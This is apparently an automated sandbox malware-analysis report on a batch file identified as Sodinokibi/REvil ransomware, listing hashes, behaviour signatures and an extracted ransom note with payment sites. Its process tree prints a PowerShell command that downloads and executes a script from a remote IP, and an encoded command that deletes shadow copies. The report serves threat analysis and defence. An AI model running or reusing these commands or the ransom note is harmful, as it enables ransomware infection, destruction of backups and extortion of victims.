Overview

overview

10

Static

static

DnRWHnp4.bat

windows7_x64

10

DnRWHnp4.bat

windows10_x64

10

Analysis

  • max time kernel
    134s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    05-05-2020 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DnRWHnp4.bat

  • Size

    195B

  • MD5

    94468061a94b1bdd17ebc1b6bbb3e47b

  • SHA1

    b4a5680c8598467c4a916ba37d936606820449be

  • SHA256

    3e7bed4a943497b3c8a6874e6981a1f3b1799f14f9a4987829baea095fbba311

  • SHA512

    18a6e54cbec9c80d7a03c6af01b1fc538c5d245dad3ea2c48fb2faf3773008fa50e1db201d4246c6019b94717fa7959607d9b71271442b93e787a786e691c166

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/DnRWHnp4

Extracted

Path

C:\4711165170-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 4711165170. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA170DC00071CC2E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/CA170DC00071CC2E Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: iojhfVp87d7W2gzXHc7yufz2SVVjahg5IcR0OwqEbHmRl09OXABxCzQs54Vmjfyx T4pAX9h4p/sihQSe9yoAKHwhUP8l4CPNZ4XUSZ24b9jU+X1xHA5JITcED4aSKOcq RGSpvPh21DMsvTDrJMHCqsHLE+r2cW2V6RhQV4SeJDrLtN8Jkep9BsntHBk3HSy5 SS3qSzzjVs/7A2r4I872Jxn+I90qT867I3kt3jP5iXiF2RQ0IzdiHZLm1guyLh7Y wxy+GYZ0prs91HVOO/fFIH5nxQM9NdhMJEDlr0otUnzlvCUK2sMhhMKynlsiumzr OhQJN9sIdJKH94s0JjmlawStHTshDBTjR+1Gay2de9xWjbDFv8VIRjJmcoiJhJfX 8zE4pN/0Vr06S2jKZUNjUXhfeUxcsDpIZQ+kkUqdjuLkutYCsFaWZ/siKXKXBTIC FHrY0g5HJFJqZ11pqeJjJd+QuGREbh8noz7b86irQCx9BhdYXz5jzPSXaua3NUyZ 0MzBPvDYmWBRLlf77HgkMXGA6XQxcYwpg8zCuc7935OehBbkP2HEesu5ve5dd/wd 0bnDxyXREB9Up3Hy3iNJmoRsAx4gtpR1hPPg11TO5TuIxtZZAGWoxMw+rC5aO8Vo VWJDb4NZnVbtwhctMBwMtKK20QQSyGL4dJY0JLXJ5UGZ1X8MDX/oInP3WYRBiRSx ZKO37RYH3fi6lUO4sdkldRKflWI49+bC6vIWZ5vQpkmftuhMhSqZ5PzB/I55Dy8n mfBYaEbAW1/GH2E0rNOFLvkAHtC1MT1EQoluB1SQIGbW2IujOJRCbxSwhL/ffuzR DEUvHDU0CIHR8oPZLlI6IW5ZhTGPMU7eP4rgf83k4CHDNfoBMQkY8c7Mx+kfELKs eY/8GmcemdtV2S+da9bzzMWkwKA5wKZQXYsuR0AFZkOM0e3gEiZiTLxTmJsNMNZT 0JTPpTi35GdUvvpVs6DDl8N5Pucf8ttAHTB9/2jsYhFv0+bTSsc3b1J9CN5w7vo/ LYRr8HoGgQ3p27jjqWZj1T0ub4bjjRGhU8ABikQL9CLxsL51pdoHNT53jVQI4XeD a4thvXMSWlrtyffKhFS+Z+tW3pHSpnbxGMlKLyOsH2DRhxcbOn4+ZlOOF9/na2ho /sPWCxG/QMmzeMegjFQzzkrp7YOwri/K3sk0aL+q+z9Nby4jdraoWAunmwFtR72X 2hWaWFXbCuiipc1xECNXXRHairN83wxvHp8WaskJbGngPqE37rhSxY0OKlhTY0pG Ro1mbC9S644QU0lViiNRWdWB7H8h+XuUgaXlSeoAMopu211D6EHyUg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA170DC00071CC2E

http://decryptor.cc/CA170DC00071CC2E

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DnRWHnp4.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/DnRWHnp4');Invoke-GZYYYWYTPJDW;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      PID:644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1844
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1580

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit